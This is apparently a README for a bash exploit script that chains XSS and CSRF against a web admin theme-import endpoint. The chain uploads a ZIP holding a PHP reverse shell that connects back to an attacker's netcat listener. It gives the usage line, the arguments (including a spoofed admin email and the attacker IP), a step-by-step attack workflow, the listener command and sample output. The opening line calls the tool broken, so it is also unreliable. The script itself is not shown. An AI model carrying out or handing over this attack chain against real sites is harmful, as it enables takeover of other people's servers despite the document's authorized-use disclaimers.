Seems broken for now will update later

Exploit Script for CSRF and Reverse Shell Attack

This script automates a CSRF (Cross-Site Request Forgery) exploit to upload a PHP reverse shell on a target's web server and execute it. The reverse shell is delivered as a ZIP file via a crafted CSRF payload, which is triggered when a privileged user interacts with a specific endpoint. The script requires a listening Netcat instance to capture the reverse shell connection.

Requirements

• Netcat: Ensure Netcat is installed and can listen on a specified port (default: 9001).
• Python 3: Used to serve files over HTTP.
• Curl & JQ: Used to fetch and handle HTTP requests and JSON parsing.

Usage

./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>

Arguments

• target_url: Base URL of the target (e.g., https://example.com).
• admin_endpoint: Path to the admin theme import endpoint.
• admin_email: Email address of an administrator (to spoof for the payload).
• attacker_ip: IP address where the reverse shell listener will receive the connection.

Example

./exploit.sh https://victim.com /admin-panel admin@victim.com 192.168.1.10

Exploit Workflow

1. Reverse Shell Creation: Generates a PHP reverse shell using revshells.com with the provided attacker_ip and port 9001.
2. ZIP Packaging: The reverse shell script (love.php) is compressed into Love-exploit.zip.
3. CSRF Token Fetch: Retrieves the CSRF token from the target to authorize the theme import request.
4. HTML Payload Construction: Builds an HTML payload (csrf_payload.html) containing a JavaScript script to automatically submit a malicious request to the target's admin panel to import the reverse shell.
5. HTTP Server Setup: A temporary HTTP server on port 8000 serves Love-exploit.zip for the target to import.
6. XSS Upload and CSRF Trigger: The CSRF payload is uploaded to the target’s contact page. When accessed, it triggers the CSRF attack.
7. Reverse Shell Listener: The attacker monitors incoming connections from the victim using Netcat.

Execution Steps

1. Start a Netcat listener on your machine:

   nc -nvlp 9001

2. Run the script:

   ./exploit.sh https://victim.com /admin-panel admin@victim.com 192.168.1.10

3. Wait for the target to execute the CSRF payload and receive the reverse shell connection.

Output

The script outputs the following information during execution:

• CSRF token retrieval status.
• Status of reverse shell creation and packaging.
• Status of payload delivery and HTTP server status.

Important Notes

• Permissions: This script requires permission to execute on the target server. Unauthorized use is illegal and punishable by law.
• Testing Environment: Use in a controlled, authorized environment only, such as a cybersecurity lab.
• Port Conflicts: Ensure ports 8000 (HTTP server) and 9001 (Netcat listener) are free before running the script.

---

Example Output

[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...

This document is intended for use by penetration testers and cybersecurity researchers in controlled environments. Misuse of this tool for unauthorized purposes is strictly prohibited.

---

Disclaimer

This script is for educational purposes and legal cybersecurity assessments only. Unauthorized use against a system without permission is illegal and against ethical guidelines.